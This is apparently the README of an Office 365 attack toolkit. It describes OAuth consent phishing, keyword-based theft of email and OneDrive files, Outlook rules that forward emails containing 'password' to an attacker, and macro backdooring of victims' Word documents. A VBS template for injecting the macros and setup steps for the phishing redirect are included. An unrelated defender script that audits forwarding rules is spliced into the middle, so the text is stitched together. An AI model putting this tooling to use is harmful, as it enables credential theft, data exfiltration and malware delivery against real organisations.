o365-attack-toolkit allows operators to perform an OAuth
Some of the implemented features are:
- Extraction of keyworded e-mails from Outlook.
- Creation of Outlook Rules.
- Extraction of files from OneDrive/SharePoint.
- Injection of macros on Word documents.
interface can be used to inspect the extracted data from the Microsoft Graph API.
Outlook Keyworded Extraction
User emails can be extracted by this toolkit using keywords. For each keyword defined in the configuration file, all the emails that match it will be downloaded and saved in the database. The operator can inspect the downloaded emails through the management interface.
OneDrive/SharePoint Keyworded Extraction
Microsoft Graph API can be used to access files across OneDrive, OneDrive for Business and SharePoint document libraries. User files can be extracted by this toolkit using keywords. For each keyword defined in the configuration file, all the documents that match it will be downloaded and saved locally. The operator can examine the documents using the management interface.
Outlook Rules Creation
Microsoft Graph API supports the creation of Outlook rules. You can define different rules by placing the rule JSON files in the rules/ folder.
Below is an example rule that, when loaded, will forward every email that contains password in the body to
"displayName": "Example Rule",
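A defender-side check for the kind of rule described above, added here as an example and not part of the toolkit: it audits a mailbox's inbox rules, in the shape Microsoft Graph returns them from `GET /me/mailFolders/inbox/messageRules`, for forwarding to external recipients combined with content keywords or deletion. The keyword watch-list, the internal domain set and the sample rules are constructed assumptions.

```python
import json

# Graph messageRule actions that copy mail to other recipients.
FORWARDING_ACTIONS = ("forwardTo", "forwardAsAttachmentTo", "redirectTo")
KEYWORD_CONDITIONS = ("bodyContains", "subjectContains", "bodyOrSubjectContains")
SENSITIVE_WORDS = {"password", "credentials", "invoice", "payment"}  # assumed watch-list

def audit_rule(rule, internal_domains):
    """Return (severity, reasons) for one messageRule dict."""
    actions = rule.get("actions") or {}
    conditions = rule.get("conditions") or {}
    reasons = []
    for action in FORWARDING_ACTIONS:
        for rcpt in actions.get(action) or []:
            addr = ((rcpt.get("emailAddress") or {}).get("address") or "").lower()
            # Exact domain match: subdomains must be listed explicitly.
            if addr.rpartition("@")[2] not in internal_domains:
                reasons.append(f"{action} -> external {addr}")
    if not reasons:
        return "ok", []
    words = {w.lower() for c in KEYWORD_CONDITIONS for w in conditions.get(c) or []}
    hits = sorted({s for s in SENSITIVE_WORDS for w in words if s in w})
    deletes = bool(actions.get("delete") or actions.get("permanentDelete"))
    if hits:
        reasons.append("keyword filter: " + ", ".join(hits))
    if deletes:
        reasons.append("original deleted after forwarding")
    # External forwarding alone is medium; a keyword filter or delete raises it.
    return ("high" if hits or deletes else "medium"), reasons

def audit_mailbox(rules_json, internal_domains):
    """rules_json: body of a messageRules listing, i.e. {"value": [...]}."""
    report = {}
    for rule in json.loads(rules_json).get("value", []):
        severity, reasons = audit_rule(rule, internal_domains)
        if severity != "ok":
            report[rule.get("displayName") or rule.get("id")] = (severity, reasons)
    return report

# Constructed sample response; addresses, domains and ids are placeholders.
SAMPLE = json.dumps({"value": [
    {"displayName": "Example Rule", "conditions": {"bodyContains": ["password"]},
     "actions": {"forwardTo": [{"emailAddress": {"address": "collector@mail.example.net"}}]}},
    {"displayName": "Newsletters", "conditions": {"senderContains": ["news"]},
     "actions": {"moveToFolder": "constructed-folder-id"}},
    {"displayName": "To assistant",
     "actions": {"forwardTo": [{"emailAddress": {"address": "pa@corp.example.com"}}]}},
]})

if __name__ == "__main__":
    print(audit_mailbox(SAMPLE, {"corp.example.com"}))
```

Running the audit on a schedule and after any new OAuth consent grant surfaces rules like the one above without relying on the user noticing missing mail.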
Word Document Macro Backdooring
User documents hosted on OneDrive can be backdoored by injecting macros. If this feature is enabled, the last 15 documents accessed by the user will be downloaded and backdoored with the macro defined in the configuration file. After the backdoored file has been uploaded, the extension of the document will be changed to .doc in order for the macro to be supported in Word. It should be noted that after backdooring the documents, they cannot be edited online, which increases the chances of our payload execution.
This functionality can only be used on Windows because the insertion of macros is done using the Word COM object. A VBS file is built from the template below and executed, so don't panic if you see
Dim wdApp
Set wdApp = CreateObject("Word.Application")
wdApp.Documents.Open("")
wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "MACRO"
wdApp.Documents(1).SaveAs2 "OUTPUT", 0
wdApp.Quit
How to set up
An example configuration is shown below:
git clone https://github.com/0x09AL/o365-attack-toolkit
dep ensure
Before you start using this toolkit, you need to create an Application on the Azure Portal. Go to Azure -> App Registrations -> Register an application.
After creating the application, copy the Application ID and change it on
The URL (external listener) that will be used for phishing should be added as a Redirect URL. To add a redirect URL, go to the application and click Add a Redirect URL.
The Redirect URL should be the URL that will be used to host the phishing endpoint, in this case
Make sure to check both the boxes as shown below:
It should be noted that you can run this tool on any operating system that Go supports, but the Macro
The look of the phishing page can be changed on
Apart from all the features this tool has, it also opens some attack surface on the host running the tool. Firstly, the Macro Backdooring functionality will open the Word files, and if you are running an unpatched version of Office, bad things can happen. Additionally, the extraction of files can download malicious files, which will be saved on your computer.
The best approach would be isolating the host properly and only allowing communication with the HTTPS redirector and Microsoft Graph API.
The management interface allows the operator to browse the data that has been extracted.
View User Emails